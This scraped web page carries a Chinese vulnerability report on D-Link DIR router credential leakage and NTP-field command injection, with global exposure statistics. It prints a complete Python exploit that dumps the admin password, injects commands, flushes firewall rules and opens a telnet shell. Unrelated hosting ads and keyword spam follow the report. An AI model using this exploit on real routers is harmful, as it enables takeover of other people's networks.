路由器远程连接命令

远程连接命令  时间:2021-04-05  阅读:()
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第1页D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告知道创宇404实验室文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第2页1.
更新情况版本时间描述第一版2017/08/11完成D-Link路由器信息泄露和远程命令执行漏洞数据分析第二版2017/08/12完成D-Link路由器信息泄露和远程命令执行漏洞代码分析并完成文档整合2.
背景概述D-Link(即友讯网络)[1],一家生产网络硬件和软件产品的企业,主要产品有交换机、无线产品、宽带产品、网卡、路由器、网络摄像机和网络安全产品(防火墙)等.
2017年8月8号,SecuriTeam在博客公布了D-Link850L多个漏洞的漏洞细节和PoC[2],其中包括通过WAN和LAN的远程代码执行、通过WAN和LAN口的未授权信息泄露、通过LAN的root远程命令执行.
2017年8月9日,Seebug收录了该厂商旗下D-LinkDIR-850L云路由器的多个漏洞[3].
攻击者通过路由器公网入口可获取路由器后台登录凭证并执行任意代码.
知道创宇404实验室本地测试发现多款D-LinkDIR系列路由器也受到该漏洞影响.
根据ZoomEye的探测和分析,存在漏洞的D-Link路由器型号如下:DIR-868LDIR-850LDIR-610DIR-610N+DIR-860LDIR-865LDIR-600DIR-845LDIR-815DIR-300DIR-629DIR-110DIR-616DIR-852DIR-820LWDIR-456UDIR-868LD-Link供应商已经发布了补丁Firmware:1.
14B07BETA修复该漏洞[4].
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第3页3.
漏洞分析这个漏洞由两个漏洞组成,通过第一个漏洞和第二个漏洞,可以形成完整的攻击链.
根据公布的PoC我们可以分析漏洞的成因.
下面是PoC的代码.
1.
#!
/usr/bin/envpython32.
#pylint:disable=C01033.
#4.
#pip3installrequestslxml5.
#6.
importhmac7.
importjson8.
importsys9.
fromurllib.
parseimporturljoin10.
fromxml.
sax.
saxutilsimportescape11.
importlxml.
etree12.
importrequests13.
14.
try:15.
requests.
packages.
urllib3.
disable_warnings(requests.
packages.
urllib3.
exceptions.
InsecureRequestWarning)16.
except:17.
pass18.
19.
TARGET=sys.
argv[1]20.
COMMAND=";".
join([21.
"iptables-F",22.
"iptables-X",23.
"iptables-tnat-F",24.
"iptables-tnat-X",25.
"iptables-tmangle-F",26.
"iptables-tmangle-X",27.
"iptables-PINPUTACCEPT",28.
"iptables-PFORWARDACCEPT",29.
"iptables-POUTPUTACCEPT",30.
"telnetd-p23090-l/bin/date"#port'Z2'31.
])32.
33.
session=requests.
Session()34.
session.
verify=False35.
36.
37.
38.
print("Getpassword.
.
.
")文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第4页39.
40.
headers={"Content-Type":"text/xml"}41.
cookies={"uid":"whatever"}42.
data="""43.
44.
45.
htdocs/webinc/getcfg/DEVICE.
ACCOUNT.
xml46.
47.
"""48.
49.
resp=session.
post(urljoin(TARGET,"/hedwig.
cgi"),headers=headers,cookies=cookies,data=data)50.
#print(resp.
text)51.
52.
#getcfg:.
.
.
53.
#hedwig:54.
#:.
.
.
55.
accdata=resp.
text[:resp.
text.
find("57.
admin_pasw=""58.
59.
tree=lxml.
etree.
fromstring(accdata)60.
accounts=tree.
xpath("/module/device/account/entry")61.
foraccinaccounts:62.
name=acc.
findtext("name","")63.
pasw=acc.
findtext("password","")64.
print("name:",name)65.
print("pass:",pasw)66.
ifname=="Admin":67.
admin_pasw=pasw68.
69.
ifnotadmin_pasw:70.
print("Adminpasswordnotfound!
")71.
sys.
exit()72.
73.
74.
75.
print("Authchallenge.
.
.
")76.
resp=session.
get(urljoin(TARGET,"/authentication.
cgi"))77.
#print(resp.
text)78.
79.
resp=json.
loads(resp.
text)80.
ifresp["status"].
lower()!
="ok":81.
print("Failed!
")82.
print(resp.
text)83.
sys.
exit()84.
85.
print("uid:",resp["uid"])86.
print("challenge:",resp["challenge"])87.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第5页88.
session.
cookies.
update({"uid":resp["uid"]})89.
90.
print("Authlogin.
.
.
")91.
user_name="Admin"92.
user_pasw=admin_pasw93.
94.
data={95.
"id":user_name,96.
"password":hmac.
new(user_pasw.
encode(),(user_name+resp["challenge"]).
encode(),"md5").
hexdigest().
upper()97.
}98.
resp=session.
post(urljoin(TARGET,"/authentication.
cgi"),data=data)99.
#print(resp.
text)100.
101.
resp=json.
loads(resp.
text)102.
ifresp["status"].
lower()!
="ok":103.
print("Failed!
")104.
print(resp.
text)105.
sys.
exit()106.
print("OK")107.
108.
109.
110.
data={"SERVICES":"DEVICE.
TIME"}111.
resp=session.
post(urljoin(TARGET,"/getcfg.
php"),data=data)112.
#print(resp.
text)113.
114.
tree=lxml.
etree.
fromstring(resp.
content)115.
tree.
xpath("//ntp/enable")[0].
text="1"116.
tree.
xpath("//ntp/server")[0].
text="metelesku;("+COMMAND+")&exit;"117.
tree.
xpath("//ntp6/enable")[0].
text="1"118.
119.
120.
121.
print("hedwig")122.
123.
headers={"Content-Type":"text/xml"}124.
data=lxml.
etree.
tostring(tree)125.
resp=session.
post(urljoin(TARGET,"/hedwig.
cgi"),headers=headers,data=data)126.
#print(resp.
text)127.
128.
tree=lxml.
etree.
fromstring(resp.
content)129.
result=tree.
findtext("result")130.
ifresult.
lower()!
="ok":131.
print("Failed!
")132.
print(resp.
text)133.
sys.
exit()134.
print("OK")135.
136.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第6页137.
138.
print("pigwidgeon")139.
140.
data={"ACTIONS":"SETCFG,ACTIVATE"}141.
resp=session.
post(urljoin(TARGET,"/pigwidgeon.
cgi"),data=data)142.
#print(resp.
text)143.
144.
tree=lxml.
etree.
fromstring(resp.
content)145.
result=tree.
findtext("result")146.
ifresult.
lower()!
="ok":147.
print("Failed!
")148.
print(resp.
text)149.
sys.
exit()150.
print("OK")hedwig.
cgi会调用fatlady.
php来应用设置加载配置.
这里我们可以通过设置service来加载任何php后缀的文件.
/htdocs/webinc/fatlady.
php这里我们可以通过加载配置文件来列出用户账户的口令.
/htdocs/webinc/getcfg/DEVICE.
ACCOUNT.
xml.
php文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第7页获得管理员口令后,我们可以登陆并出发第二个漏洞–NTP服务器shell命令注入通过请求getcfg.
php来加载DEVICE.
TIME.
php页面.
/htdocs/web/getcfg.
php文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第8页跟入DEVICE.
TIME.
php页面这里server变量没有任何过滤直接拼入命令通过上述两个漏洞,我们就可以无限制命令执行.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第9页以下为漏洞证明:成功命令执行.
4.
数据分析根据ZoomEye网络空间搜索引擎截止到2017年8月9日探测和分析的数据,对存在漏洞的D-Link路由器进行全球范围的分析,如下图所示.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第10页图1D-LinkDIR系列路由器信息泄露和远程命令执行漏洞全球态势上图是此次D-LinkDIR系列路由器信息泄露和远程命令执行漏洞的全球分析结果.
通过上图可以大体了解到哪些国家和地区的D-LinkDIR系列路由器设备正在面临严重的安全威胁.
存在威胁的D-LinkDIR系列路由器在较为发达的国家和地区比较多.
下图是受影响国家和地区top10的数据分析.
图2受到D-LinkDIR系列路由器漏洞威胁的国家和地区top10可以看到存在漏洞的D-LinkDIR系列路由器在新加坡、韩国和美国尤其多,已经超过1000条记录,新加坡更是超过了2000条记录.
其他国家和地区也存在不少.
如果修复不及文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第11页时,很有可能被黑客利用,破坏受威胁国家和地区的网络设施,造成重要数据泄露、网络瘫痪等不可挽回的严重后果.
下图是国内的情况.
图3国内受到D-LinkDIR系列路由器漏洞威胁的地区将目光转至国内.
中国内地可以探测到的受威胁的路由器设备并不多,仅有19条记录.
有安全隐患的D-LinkDIR系列路由器更多集中在我国台湾省和香港地区,一共有843条记录.
中国内地探测到的受此次漏洞威胁的路由器不多的原因可能有两点:1.
国内公网IP数稀少,分配给D-Link路由器过于奢侈;2.
D-LinkDIR系列路由器在国内销量不高.
接下来从路由器型号的角度进行分析.
文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第12页图4D-LinkDIR系列路由器漏洞版本分布(内圈表示型号.
外圈表示内圈对应型号的各个固件版本)可以看到路由器型号中DIR-868L与DIR-850L受影响比较严重,DIR-868L占了大约31.
66%,而DIR-850L大约占了21.
67%.
从固件版本来分析,DIR-868L的1.
03SHC、1.
09版本固件受影响数量多,分别占比7.
03%、5.
24%,DIR-850L的1.
15固件版本受影响数量较多,占比5.
22%,DIR-610的1.
01占比8.
11%,以及DIR-601N+的1.
00版本的固件占比7.
15%,以上受影响的固件版本占比均超过5%.
下图是受影响路由器型号详细的数据分析.
图5受威胁的路由器型号分布受漏洞威胁的路由器型号集中在DIR-868L、DIR-850L这两个型号上,共有5909条记录.
从图表中同样可以看出存在漏洞的路由器型号和固件版本影响范围之广.
下面从路由器连接端口的统计数据进行分析.
端口数量808068418026238846410802638181115808185888874999922208021900015图6路由器登陆端口top10分布文档名称:D-Link路由器信息泄露和远程命令执行漏洞分析及全球数据分析报告北京知道创宇信息技术有限公司第13页从端口上来分析,路由器登陆入口大多集中在常见的8080和80端口.
开在其他端口的情况也有很多,端口分布广泛.
5.
总结这次D-LinkDIR系列路由器远程命令执行漏洞是通过两个漏洞的配合:首先利用信息泄露获得账号及口令,然后利用NTP的漏洞执行任意命令.
此次D-LinkDIR系列路由器漏洞危害十分严重.
黑客如果拿下路由器就相当于获得了该网络的控制权.
所以请相关人员及时打上补丁,或者联系专业人员处理.
通过ZoomEye的全球数据分析可以看到,此次漏洞影响十分广泛,牵扯到全球很多国家和地区.
飞速发展的物联网给我们带来便利的同时,危险也悄然而至.
云路由让我们可以方便地控制远在天边的设备.
但与此同时,不怀好意之人也在觊觎你暴露在网络上的私有财产.
所以我们在享受网络的同时,也需要时刻注意网络安全维护.
6.
相关链接[1]D-Link官网http://us.
dlink.
com[2]漏洞详情及PoChttps://blogs.
securiteam.
com/index.
php/archives/3364[3]SeeBug收录https://www.
seebug.
org/vuldb/ssvid-96333[4]官方补丁http://support.
dlink.
com/ProductInfo.
aspxm=DIR-850L

瓜云互联:全场9折优惠,香港CN2、洛杉矶GIA高防vps套餐,充值最高返300元

瓜云互联怎么样?瓜云互联之前商家使用的面板为WHMCS,目前商家已经正式更换到了魔方云的面板,瓜云互联商家主要提供中国香港和美国洛杉矶机房的套餐,香港采用CN2线路直连大陆,洛杉矶为高防vps套餐,三网回程CN2 GIA,提供超高的DDOS防御,瓜云互联商家承诺打死退款,目前商家提供了一个全场9折和充值的促销,有需要的朋友可以看看。点击进入:瓜云互联官方网站瓜云互联促销优惠:9折优惠码:联系在线客...

sharktech:洛杉矶/丹佛/荷兰高防服务器;1G独享$70/10G共享$240/10G独享$800

sharktech怎么样?sharktech (鲨鱼机房)是一家成立于 2003 年的知名美国老牌主机商,又称鲨鱼机房或者SK 机房,一直主打高防系列产品,提供独立服务器租用业务和 VPS 主机,自营机房在美国洛杉矶、丹佛、芝加哥和荷兰阿姆斯特丹,所有产品均提供 DDoS 防护。不知道大家是否注意到sharktech的所有服务器的带宽价格全部跳楼跳水,降幅简直不忍直视了,还没有见过这么便宜的独立服...

Letbox(35美元/年),美国洛杉矶VPS终身7折

Letbox 云服务商在前面的文章中其实也有多次介绍,这个服务商其实也算是比较老牌的海外服务商,几年前我也一直有使用过他们家的VPS主机,早年那时候低至年付15-35美元左右的VPS算式比较稀缺的。后来由于服务商确实比较多,而且也没有太多的网站需要用到,所以就没有续费,最近这个服务商好像有点活动就躁动的发布希望引起他人注意。这不有看到所谓的家中有喜事,应该是团队中有生宝宝了,所以也有借此来发布一些...

远程连接命令为你推荐
网罗设计网络设计是什么专业京沪高铁上市首秀京沪高铁怎么老是出问题?高铁的核心技术是中国自己的吗?12306崩溃亲们,为什么12306手机订票系统打不开,显示网络异常,18comic.fun贴吧经常有人说A站B站,是什么意思啊?lunwenjiancepaperrater论文检测准确吗lunwenjiancepaperfree论文检测怎样算合格百度关键词工具百度有关键字分析工具吗?Google AdWords有的javmoo.com找下载JAV软件格式的网站www.se222se.comhttp://www.qqvip222.com/baqizi.cc汉字的故事100字
泛域名 工信部域名备案系统 linuxapache虚拟主机 老鹰主机 vps.net Dedicated 美国主机网 rackspace suspended 三拼域名 秒杀预告 福建铁通 免费cdn 河南移动梦网 dnspod 免费asp空间申请 买空间网 512内存 远程登录 电信测速器在线测网速 更多